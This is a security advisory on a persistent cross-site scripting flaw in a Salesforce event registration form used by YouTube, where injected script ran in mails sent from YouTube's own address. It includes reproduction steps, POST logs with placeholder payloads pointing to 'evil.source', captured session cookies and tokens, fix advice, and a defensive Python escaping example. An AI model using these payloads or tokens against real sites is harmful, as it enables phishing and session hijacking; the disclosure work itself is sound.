Document Title:
===============
Salesforce RegistrationForm - Persistent Web Vulnerability
Date:
=====
2018-06-21
References:
===========
https://www.vulnerability-lab.com/get_content.php?id=2054
Salesforce Security ID: 219513
VL-ID:
=====
2054
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Introduction:
=============
Salesforce.com is an American cloud computing company headquartered in San Francisco, California.
Though its revenue comes from a customer relationship management (CRM) product, Salesforce also
capitalizes on commercial applications of social networking through acquisition. As of early 2016,
it is one of the most highly valued American cloud computing companies with a market capitalization
above $55 billion, although the company has never turned a GAAP profit in any fiscal year since its
inception in 1999.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Salesforce.com )
Abstract:
=========
The Vulnerability Laboratory core research team discovered a persistent cross-site scripting web vulnerability in
the Salesforce RegistrationForm web application used by Google YouTube.
Report-Timeline:
================
2018-06-22: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Salesforce
Product: Event Registration - Online Service (Web-Application) v2017 Q1
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
A persistent input validation vulnerability has been discovered in the Salesforce event registration form used by the
Google YouTube creators application. The vulnerability allows remote attackers to inject their own malicious script code
on the application side and to compromise modules and functions through targeted client-side attacks.
The injection point is the Salesforce registration form; the final affected sender is the original YouTube mail domain.
Attackers can inject malicious script code that is delivered in manipulated emails sent from the original YouTube
sender address. The attack vector is on the application side and the request method used to inject is POST.
The security risk of the persistent input validation vulnerability is estimated as medium with a CVSS score of 4.3.
Exploitation of the persistent input validation web vulnerability requires low user interaction and no privileged
web application customer user account. Successful exploitation of the vulnerability results in session hijacking,
persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of
affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Event Registration - Youtube Google
Vulnerable Input Fields(s):
[+] Firstname
[+] Lastname
Vulnerable Parameter(s):
[+] j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA
[+] j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA
Affected Module(s):
[+] Email & Frontend (creator-academy-noreply@youtube.com)
Affected Domain(s):
[+] youtube.com (google)
[+] salesforce (force.com)
Proof of Concept:
=================
The persistent cross-site scripting vulnerability can be exploited by remote attackers without a privileged web application user account and with low user interaction.
To demonstrate or reproduce the vulnerability, follow the information and steps below.
Manual steps to reproduce the vulnerability ...
1. Open the vulnerable registration form
2. Inject the test payloads into the marked vulnerable name input fields
3. Fill the remaining fields with random values and an existing test mailbox, then submit the request via POST
Note: because the form does not filter the input, the data is passed unchanged to the YouTube creator events module
4. An email from the original YouTube sender arrives in the registered, unconfirmed mailbox
5. The payload executes next to the name in the greeting of the email body, in the message template generated from the stored data
6. The stored XSS vulnerability is successfully reproduced
Note: Both parties need to fix the issue, so the report is combined to assist YouTube (Google) and Salesforce
through their bug bounty programs.
PoC: Vulnerable Source
Hey there, "><[MALICIOUS EXECUTE IN NAME]>%20>"<[MALICIOUS EXECUTE IN NAME]>!
So you’re ready to take on the world with your channel, huh? That’s awesome! Because we’ve got
some pretty neat tools and ideas that can help you connect with people all over the globe. Ready to go? Just hit that big red
button below.
PoC: Youtube Ajax Session Token
QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajYzNmpGanYyLXNKOHlZRWQzODBITEVY
bmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlIxTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJG
c21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D
--- PoC Session Logs [POST] (Injection Point) ---
Status: 200[OK]
POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
Mime Type[text/xml]
Request Header:
Host[youtube.secure.force.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw==&visit_id=1-636271849160336494-3810832860&p=youtube_boot_camp&rd=1]
Content-Length[137382]
Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA]
Connection[keep-alive]
POST data:
AJAXREQUEST[_viewRoot]
j_id0%3Aj_id32[j_id0%3Aj_id32]
j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on]
j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com]
j_id0%3Aj_id32%3Aj_id155%3Aj_id177[]
j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.]
j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.]
j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.]
com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI6IjAwRDgwMDAwMDAwUE5UQSIsInYiOiIwMDAwMDAwMDAwMDAwMDAiLCJhIjoidmZlbmNyeXB0aW9ua2V5Ii
widSI6IjAwNTgwMDAwMDA4OWhGbyJ9mBYmEqvd%2B%2BrqUb8vM1fzpu%2BWhaBToaYNeTJ7jwAAAVtJlHbic6ZoGz41Gk8BAG7fRxiwtjM%2B5P6hSLFA4efTPzm08kfq%2F%2B
dzoOC95QLuLVPoyIIzHs6xtoomj7aD6qCap52FMutgqS2%2BZ]
com.salesforce.visualforce.ViewStateVersion[201704062358210694]
com.salesforce.visualforce.ViewStateMAC [AGV5SnViMjVqWlNJNkltdGZjRzFJVTNZNE5qQlpSR0pzV1hkd2RYWTBlVkF6YkhsMlQzbENOeTFXYWpZM1dHTnNiRVJMU21kY
2RUQXdNMlFpTENKMGVYQWlPaUp
LVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU1VVFWd2lMRndpZGx3aU9sd2lNREF3TURBd01EQXdNR
EF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmNJanBjSWpBd05UZ3dNREF3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjB
JbDBzSW1saGRDSTZNVFE1TVRVNE9ERXhPREk0TVN3aVpYaHdJam93ZlE9PS4uX1VJN0g5elhIdjFwVnNOSm80dVJDaVZOaFBJQVIxT1AzVXA1bENfeGRXZz0%3D]
j_id0%3Aj_id32%3AinitRegistration[j_id0%3Aj_id32%3AinitRegistration]
Response Header:
Date[Fri, 07 Apr 2017 18:03:07 GMT]
x-xss-protection[1; mode=block]
Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0]
Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin]
X-Powered-By[Salesforce.com ApexPages]
p3p[CP="CUR OTR STA"]
Ajax-Response[true]
Content-Type[text/xml;charset=UTF-8]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Transfer-Encoding[chunked]
-
Status: 200[OK]
POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
Mime Type[text/xml]
Request Header:
Host[youtube.secure.force.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw==&visit_id=1-636271849160336494-3810832860&p=youtube_boot_camp&rd=1]
Content-Length[137956]
Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA]
Connection[keep-alive]
POST data:
AJAXREQUEST[j_id0%3Aj_id32%3Aj_id155%3Aj_id173]
j_id0%3Aj_id32[j_id0%3Aj_id32]
j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on]
j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3Ciframe%3E%2520%3E%22%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com]
j_id0%3Aj_id32%3Aj_id155%3Aj_id177[Yes]
j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.]
j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.]
j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.]
com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI6IjAwRDgwMDAwMDAwUE5UQSIsIWxcDiHyDaSOw17yd3Cg%3D]
com.salesforce.visualforce.ViewStateVersion[201704062358210694]
com.salesforce.visualforce.ViewStateMAC [AGV5SnViMjVqWlNJNkluWnlWa1owVDBoNFNrMTFOM0ZyV1dwTk9UbHNSR1JPUm1seFJtZHlTM0JuTWs1blJVSkVTR2g0VDNOY2RUQXdNMlFpT
ENKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU1VVFWd2lMRndp
ZGx3aU9sd2lNREF3TURBd01EQXdNREF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmNJanBjSWpBd05UZ3dNREF
3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjBJbDBzSW1saGRDSTZNVFE1TVRVNE9ERTRPRE01TUN3aVpYaHdJam93ZlE9PS4uVW9Qal
BBWmNIQjhXRkU4Ulh0THB2T2VzYThkR2dxZE13ZFdOWnM4dVIzbz0%3D]
j_id0%3Aj_id32%3Aj_id155%3Aj_id177%3Aj_id178[j_id0%3Aj_id32%3Aj_id155%3Aj_id177%3Aj_id178]
Response Header:
Date[Fri, 07 Apr 2017 18:03:12 GMT]
x-xss-protection[1; mode=block]
Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0]
Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin]
X-Powered-By[Salesforce.com ApexPages]
p3p[CP="CUR OTR STA"]
Ajax-Response[true]
Content-Type[text/xml;charset=UTF-8]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Transfer-Encoding[chunked]
-
Status: 200[OK]
POST https://www.youtube.com/creator_suggestions_ajax?new_state=EVENT_SEEN&suggestion=ytca_analytics_series_2016&location=LOCATION_CHANNEL_CHECKLIST&ui_type=UI_TYPE_DEFAULT&action_update_channel_suggestion=1
Mime Type[application/json]
Request Header:
Host[www.youtube.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate, br]
X-YouTube-Client-Name[1]
X-YouTube-Client-Version[1.20170406]
X-YouTube-Identity-Token[QUFFLUhqbkJrbDU2d2cyQk82ZHBZVEc3Tmhyck9teHkzUXw=]
X-YouTube-Page-CL[152397198]
X-YouTube-Page-Label[youtube_20170406_0_RC2]
X-YouTube-Variants-Checksum[2275f96a3a17364aca2366efd7c35d46]
Content-Type[application/x-www-form-urlencoded]
Referer[https://www.youtube.com/user/vulnerability0lab]
Content-Length[284]
Cookie[VISITOR_INFO1_LIVE=XKr3svEjLco; PREF=f1=50000000&f5=30; YSC=BnHxqoYEhPg;
SID=igTRRvC2JTQVE0SXFw0-Jz7I_7brhhCMfb0JocaqLmzZwFWtpYplR1QDIa8VW3BeFKVebQ.; HSID=AfImtCSKjlhjrHodg;
SSID=AhWHw2um0Z7WVLOQv; APISID=_ONLJITyRiSfF0or/AKPVNxNp084EAZmxm; SAPISID=tnogHnh4UrZzCXpK/AMF9HkrXhYZRzy2EY;
CONSENT=YES+DE.de+20150712-15-0; LOGIN_INFO=AOmCA4wwRQIgekLu-fXR9_7sZgXdrFjyCn_V2riu05Uod5AfZgMn8Q8CIQC7NOOvc_
FfvwbmqBPi0MajBNCQO2AbfktTASPb9bwAdg:QUZVTU5Gd19RV3JFZUhXa
3FINUhSYmh5WE8xdDk4cmY5d25KaXB2M1NFYWUwYVY2UFdQMFQ3YWd0amx4QTVzYnZhNHBPb241NGFCMGQ3T05LcmhReEwyQTBKWnl4enMxOH
FRTFBqY2tiRllIdDNCQk9PcnQyRVNPaGduakg1WVU0OTV5eFlVeW44dTNOc3BOM2M1c0pCVlJHNUVseTRBWU53]
DNT[1]
Connection[keep-alive]
POST data:
o[U]
session_token [QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajYzNmpGanYyLXNKOHlZRWQzODBITEVY
bmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlIxTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJG
c21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D]
Response Header:
Strict-Transport-Security[max-age=31536000]
x-frame-options[SAMEORIGIN]
Content-Length[15]
Content-Disposition[attachment]
X-Content-Type-Options[nosniff]
Expires[Tue, 27 Apr 1971 19:44:06 EST]
Cache-Control[no-cache]
Content-Type[application/json; charset=UTF-8]
Date[Fri, 07 Apr 2017 18:03:21 GMT]
Server[YouTubeFrontEnd]
x-xss-protection[1; mode=block]
Alt-Svc[quic=":443"; ma=2592000; v="37,36,35"]
X-Firefox-Spdy[h2]
-
Status: 200[OK]
POST https://www.youtube.com/creator_suggestions_ajax?new_state=EVENT_SEEN&suggestion=ytca_community_2017&location=LOCATION_CHANNEL_CHECKLIST&ui_type=UI_TYPE_DEFAULT&action_update_channel_suggestion=1
Mime Type[application/json]
Request Header:
Host[www.youtube.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
X-YouTube-Client-Name[1]
X-YouTube-Client-Version[1.20170406]
X-YouTube-Identity-Token[QUFFLUhqbkJrbDU2d2cyQk82ZHBZVEc3Tmhyck9teHkzUXw=]
X-YouTube-Page-CL[152397198]
X-YouTube-Page-Label[youtube_20170406_0_RC2]
X-YouTube-Variants-Checksum[2275f96a3a17364aca2366efd7c35d46]
Content-Type[application/x-www-form-urlencoded]
Referer[https://www.youtube.com/user/vulnerability0lab]
Content-Length[284]
Cookie[VISITOR_INFO1_LIVE=XKr3svEjLco; PREF=f1=50000000&f5=30; YSC=BnHxqoYEhPg;
SID=igTRRvC2JTQVE0SXFw0-Jz7I_7brhhCMfb0JocaqLmzZwFWtpYplR1QDIa8VW3BeFKVebQ.; HSID=AfImtCSKjlhjrHodg;
SSID=AhWHw2um0Z7WVLOQv; APISID=_ONLJITyRiSfF0or/AKPVNxNp084EAZmxm; SAPISID=tnogHnh4UrZzCXpK/AMF9HkrXhYZRzy2EY;
CONSENT=YES+DE.de+20150712-15-0; LOGIN_INFO=AOmCA4wwRQIgekLu-fXR9_7sZgXdrFjyCn_V2riu05Uod5AfZgMn8Q8CIQC7NOOvc_
FfvwbmqBPi0MajBNCQO2AbfktTASPb9bwAdg:
QUZVTU5Gd19RV3JFZUhXa3FINUhSYmh5WE8xdDk4cmY5d25KaXB2M1NFYWUwYVY2UFdQMFQ3YWd0amx4QTVzYnZh
NHBPb241NGFCMGQ3T05LcmhReEwyQTBKWnl4enMxOHFRTFBqY2tiRllIdDNCQk9PcnQyRVNPaGduakg1WVU0OTV5e
FlVeW44dTNOc3BOM2M1c0pCVlJHNUVseTRBWU53; ST-1qyw03o=ei=8tPnWPWNE4O7WYKQkNgB&feature=
rc-rel&ved=CMgDEPQcGAAiEwj1zrDO9pLTAhWDXRYKHQIIBBsomxw&csn=8tPnWPWNE4O7WYKQkNgB]
Connection[keep-alive]
POST data:
o[U]
session_token [QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajY
zNmpGanYyLXNKOHlZRWQzODBITEVYbmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlI
xTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJGc21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D]
Response Header:
X-Content-Type-Options[nosniff]
Content-Type[application/json; charset=UTF-8]
Expires[Tue, 27 Apr 1971 19:44:06 EST]
Strict-Transport-Security[max-age=31536000]
Content-Length[15]
x-frame-options[SAMEORIGIN]
Cache-Control[no-cache]
Content-Disposition[attachment]
Date[Fri, 07 Apr 2017 18:03:26 GMT]
Server[YouTubeFrontEnd]
x-xss-protection[1; mode=block]
Alt-Svc[quic=":443"; ma=2592000; v="37,36,35"]
X-Firefox-Spdy[h2]
-
Status: 200[OK]
POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
Mime Type[text/xml]
Request Header:
Host[youtube.secure.force.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw==&visit_id=1-636271849160336494-3810832860&p=youtube_boot_camp&rd=1]
Content-Length[137818]
Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA]
Connection[keep-alive]
POST data:
AJAXREQUEST[_viewRoot]
j_id0%3Aj_id32[j_id0%3Aj_id32]
j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on]
j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com]
j_id0%3Aj_id32%3Aj_id155%3Aj_id177[Yes]
j_id0%3Aj_id32%3Aj_id155%3Aj_id186[https%3A%2F%2Fwww.youtube.com%2Fuser%2FDellVlog]
j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.]
j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.]
j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.]
com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI3lYNdCa7hoyPCYB2pOU8KcV%2FuljILNXTK21XGpDFdR1RhEn%2BIaDaP1MJtc5lq1ZYj2vtBBwiM2XiyZ6ynF
KIdgT53K5Pu28vND9fJ9Q8T%2FP%2FMxHqJ9ohFeKza8vyggT%2F72a%2FP]
com.salesforce.visualforce.ViewStateVersion[201704062358210694]
com.salesforce.visualforce.ViewStateMAC [AGV5SnViMjVqWlNJNkltVXRZbGxtTTBOTWNFZHNhbXBqVkhaa2RITjZVblJpWkdzd1VrbzJTbTVCUjFod1ExRTNhSEJXUlRCY2RUQXd
NMlFpTENKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU
1VVFWd2lMRndpZGx3aU9sd2lNREF3TURBd01EQXdNREF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmN
JanBjSWpBd05UZ3dNREF3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjBJbDBzSW1saGRDSTZNVFE1TVRVNE9ERTVNekF3TUN
3aVpYaHdJam93ZlE9PS4uQS10bExWZFhwT3VTVlFqWEhZeVdaSG5MMjBfRGlTTlhxU3ljYkdrandPUT0%3D]
j_id0%3Aj_id32%3AinitRegistration[j_id0%3Aj_id32%3AinitRegistration]
Response Header:
Date[Fri, 07 Apr 2017 18:03:31 GMT]
x-xss-protection[1; mode=block]
Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0]
Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin]
X-Powered-By[Salesforce.com ApexPages]
p3p[CP="CUR OTR STA"]
Pragma[no-cache]
Ajax-Response[true]
Content-Type[text/xml;charset=UTF-8]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Transfer-Encoding[chunked]
Reference(s):
https://youtube.secure.force.com/
https://youtube.secure.force.com/EventRegistration/
https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
https://www.youtube.com/
https://www.youtube.com/creator_suggestions_ajax
Solution:
=========
1. Restrict the input fields and disallow the use of special characters
2. Parse or escape all inputs when processing the POST request
3. Encode the output in the email notification on both sides, force.com and youtube.com, to prevent targeted exploitation
The issue was resolved by the Salesforce developer team at the end of 2017 (Q4). The issue was also
reported to Google YouTube to ensure that malformed content from the input is not forwarded insecurely
to customers or users. The issue has been resolved by both parties.
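The following is an added example written for this page; it is not code from the advisory, from Salesforce or from YouTube. It models in Python what the session log and the solution steps describe: it decodes a form-encoded POST body shaped like the captured request (using the parameter names from the log), flags name fields that carry tag syntax, and renders the "Hey there, <first> <last>!" greeting of the notification mail both the way the affected template behaved (raw interpolation into the HTML body) and the hardened way (HTML-escaped, as in solution step 3). The sample body, the stand-in payload modelled on the log's "><... src=evil.source> fragment, the apostrophe name and the mail address are constructed; the greeting text is taken from the PoC section; the function names are the example's own.

```python
"""Added example: decode a captured registration POST, flag markup in the
name fields, and render the mail greeting unescaped (affected behaviour)
versus HTML-escaped (hardened). Not Salesforce or YouTube code."""
import html
import re
from urllib.parse import parse_qs

# Parameter names exactly as in the advisory's session log (decoded form).
FIRST = "j_id0:j_id32:j_id155:yt_firstnameJA"
LAST = "j_id0:j_id32:j_id155:yt_lastnameJA"
EMAIL = "j_id0:j_id32:j_id155:yt_email"
NAME_FIELDS = (FIRST, LAST)

# Constructed sample POST body (application/x-www-form-urlencoded), shaped like
# the captured request. The first name carries a stand-in payload modelled on
# the log's '"><... src=evil.source>' fragment; the last name is a legitimate
# value with an apostrophe, to show why a blanket "special character" block
# (solution step 1) rejects real names while output encoding does not.
SAMPLE_BODY = (
    "AJAXREQUEST=_viewRoot"
    "&j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA="
    "%22%3E%3Ciframe%20src%3Devil.source%3E"
    "&j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA=O%27Brien"
    "&j_id0%3Aj_id32%3Aj_id155%3Ayt_email=test%40example.com"
)

# Matches the opener of an HTML tag (or comment/doctype), not bare punctuation.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")


def parse_registration(body: str) -> dict:
    """Decode a form-encoded body into {field: value} (first value per key)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_markup(fields: dict) -> list:
    """Return the name fields whose decoded value contains an HTML tag opener.

    This is a detection check for the request, not the fix: it catches the
    PoC-style value, while a legitimate value such as O'Brien passes because
    only tag syntax is flagged, not every punctuation character.
    """
    return [f for f in NAME_FIELDS if f in fields and TAG_RE.search(fields[f])]


def render_greeting(fields: dict, escape: bool) -> str:
    """Build the HTML greeting line of the notification mail.

    escape=False reproduces the affected behaviour (values dropped into the
    HTML body as-is); escape=True is the hardened form, encoding each value
    for the HTML text context it is inserted into.
    """
    first, last = fields.get(FIRST, ""), fields.get(LAST, "")
    if escape:
        first, last = html.escape(first), html.escape(last)
    return f"Hey there, {first} {last}!"


def mail_body_is_clean(rendered: str) -> bool:
    """True when the rendered greeting contains no HTML tag at all
    (the greeting template itself has none, so any tag came from input)."""
    return TAG_RE.search(rendered) is None


if __name__ == "__main__":
    fields = parse_registration(SAMPLE_BODY)
    print("flagged fields:", flag_markup(fields))
    print("vulnerable:", render_greeting(fields, escape=False))
    print("hardened:  ", render_greeting(fields, escape=True))
```

Run it as a script to print both renderings. The apostrophe in O'Brien is the caveat to step 1 of the solution: a blocklist of special characters rejects legitimate names, whereas output encoding in the HTML context of the mail body neutralises the injected tag and keeps the name readable (the apostrophe becomes &#x27;, which mail clients render as an apostrophe). The check in flag_markup belongs at the form as an additional control; the encoding in render_greeting is the fix that has to be present wherever the stored value is written into HTML, on the force.com side and on the youtube.com side.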
Risk:
=====
The security risk of the persistent cross-site scripting vulnerability is estimated as medium (CVSS 4.3).
Targeted users cannot identify the manipulated content as malicious because it arrives from the original sender.
Credits:
========
Vulnerability Laboratory [Core Research Team] - (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™